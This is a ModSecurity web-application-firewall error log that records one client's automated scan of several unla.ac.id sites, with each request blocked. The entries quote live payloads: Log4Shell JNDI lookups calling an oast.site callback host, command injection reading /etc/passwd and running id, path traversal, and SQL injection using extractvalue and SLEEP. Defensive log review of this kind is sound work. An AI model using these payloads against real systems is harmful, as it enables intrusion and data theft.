[Tue Aug 29 11:31:13.310631 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAOM4dUAAAAU"]
[Tue Aug 29 11:31:13.313007 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAPMmG4AAAAY"]
[Tue Aug 29 11:31:13.314403 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAOKNvAAAAAK"]
[Tue Aug 29 11:31:13.322878 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgk14gpj6a5o8d6.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQDFSIAAAAl"]
[Tue Aug 29 11:31:13.329559 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg4jstkjnjowsoq.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQCv0IAAAAk"]
[Tue Aug 29 11:31:13.329704 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAPLwEEAAAAX"]
[Tue Aug 29 11:31:13.331933 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg1cznhr51m8fwm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQTKF0AAAA1"]
[Tue Aug 29 11:31:13.374753 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg3po7eer1xm1x4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQR43wAAAAz"]
[Tue Aug 29 11:31:13.386105 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAOM4dYAAAAU"]
[Tue Aug 29 11:31:13.425689 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQCv0MAAAAk"]
[Tue Aug 29 11:31:13.427576 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAP8GyYAAAAV"]
[Tue Aug 29 11:31:13.427758 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQUH94AAAA2"]
[Tue Aug 29 11:31:13.463599 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAPMmG8AAAAY"]
[Tue Aug 29 11:31:14.327798 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAN@5DQAAAAO"]
[Tue Aug 29 11:31:14.332007 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAP5mHEAAAAM"]
[Tue Aug 29 11:31:14.333455 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAP4H-QAAAAI"]
[Tue Aug 29 11:31:14.345267 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQMrpAAAAAu"]
[Tue Aug 29 11:31:14.366914 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPPS1cAAAAd"]
[Tue Aug 29 11:31:14.526312 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPMmHIAAAAY"]
[Tue Aug 29 11:31:14.532762 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQJWq8AAAAr"]
[Tue Aug 29 11:31:14.532883 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAQA-8IAAAAi"]
[Tue Aug 29 11:31:14.549361 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQEGGkAAAAm"]
[Tue Aug 29 11:31:14.549639 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQP65UAAAAx"]
[Tue Aug 29 11:31:14.554229 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQIS7kAAAAq"]
[Tue Aug 29 11:31:15.355472 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10k8Co-f0AAAPahxMAAAAL"]
[Tue Aug 29 11:31:15.362244 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAP8GygAAAAV"]
[Tue Aug 29 11:31:15.368770 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP5mHQAAAAM"]
[Tue Aug 29 11:31:15.421497 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP05KIAAAAA"]
[Tue Aug 29 11:31:15.424591 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAQSWKcAAAA0"]
[Tue Aug 29 11:31:15.439283 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQQyjQAAAAy"]
[Tue Aug 29 11:31:15.443819 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP5mHUAAAAM"]
[Tue Aug 29 11:31:15.462339 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQTKGQAAAA1"]
[Tue Aug 29 11:31:16.352970 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lMCo-f0AAAO88AoAAAAF"]
